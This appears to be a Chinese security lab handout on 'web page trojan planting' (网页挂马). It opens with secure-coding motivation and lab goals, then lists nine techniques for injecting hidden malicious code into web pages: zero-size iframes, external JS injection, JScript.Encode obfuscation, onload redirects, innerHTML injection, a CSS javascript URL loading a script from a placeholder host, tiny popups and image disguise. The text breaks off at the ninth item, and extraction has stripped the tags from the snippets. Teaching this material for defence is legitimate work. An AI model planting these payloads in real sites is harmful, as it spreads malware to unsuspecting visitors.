网页挂马编程实验.pdfVIP

网页挂马编程实验 应用场景 许多软件开发人员，还没有意识到软件安全编程的重要性。安全编程不仅能提高程序的 健壮性，更重要的意义在于避免存在的漏洞被攻击和利用，特别是一些网络应用软件这方面 更应引起重视。如果软件存在溢出漏洞, 那么就可能导致一些恶意的代码被运行, 从而为黑 客敞开了大门。 服务器都可以看做是一个城堡，总是处于很多敌人的攻击之下。并且，传统战争和信息 战的历史都表明，攻击者的胜利通常不完全依赖于其技巧和智慧，往往是防守者的疏忽造成 的。作为电子王国的守护者，你面对的是很多可能造成破坏的入口，特别值得注意到有以下 几个。  软件漏洞。Web 应用程序通常使用很多技术构建而成，一般包括数据库服务器、 Web 服务器、一种或多种编程语言，所以这些运行于一个或多个操作系统之上。因此，要经 常跟踪公布的漏洞，采取必要措施，在有人利用这些漏洞之前修补问题，这是至关重要的。  用户输入。利用用户输入处理的方式，可能是对你的数据和应用造成破坏的最简 单的方法。很多大流量网站受攻击的报告都证明了这一点。通过处理经Web 表单、URL 参数、 cookie 和其他可以访问的途径传递的数据，攻击者就能攻击应用程序逻辑的核心。  未能妥善保护的数据。数据是你公司的命根子；丢失数据将至你于危险当中。数据 库和Web 账户往往未加任何防范，，或者只是用一些靠不住的口令简单地加以保护，这种情 况比比皆是。或者完全可以通过一个能轻松辨认的URL 访问基于Web 对管理应用程序。存在 这种安全隐患让人无法接受，特别是，要知道解决这些问题是如此容易，只需稍加留心就可 以轻松消除这些隐患。因为每种情况都会使应用程序的完整性处于风险之中，因此都必须进 行全面检查并做相应处理。保证服务器整体性安全。 将木马和网页结合在一起，打开网页的同时也会运行木马。黑客通过挂马入侵了一些 网站后，将自己编写的网页木马嵌入被黑网站的主页中，利用被黑网站的流量将自己的网 页木马传播开去，以达到自己的某种目的。 实验目标： 1. 了解网页挂马的基本原理 2. 了解网页挂马的常用方法 3. 网页挂马的防御 实验环境： 虚拟机，Server：Windows Server 2003， Microsoft Visual Studio 2005 ，IE6.0 实验过程指导： 1. 网页挂马的方法介绍 （1） 框架挂马 iframe src=地址 width=0 height=0/iframe （2 ） js 文件挂马 首先将以下代码： document.write(iframe width= ‘0 height= ‘0 src= ‘地址/iframe); 保存为xxx.js ， 则JS 挂马代码为script language=javascript src=xxx.js/script （3 ） js 变形加密 script language=JScript.Encode src=/muma.txt/script muma.txt 可改成任意后缀 （4 ） body 挂马 body onload=window.location=地址;/body （5 ） 隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + ‘ \r\niframe src=/muma.htm//iframe; （6 ） css 中挂马 Body {background-image:url(‘javascript:document.write(script src=http://www.XXX.net/muma.js/script))} （7 ） JAVA 挂马 SCRIPT language=javascriptwindow.open(地址,,toolbar=no,location=no,directories=no, status=no,menubar=no,scro llbars=no,width=1,height=1); /script （8 ） 图片伪装 html iframe src= 网马地址 height=0 width=0/iframeimg src= 图片地址/center/html （9 ） 伪装调用： frames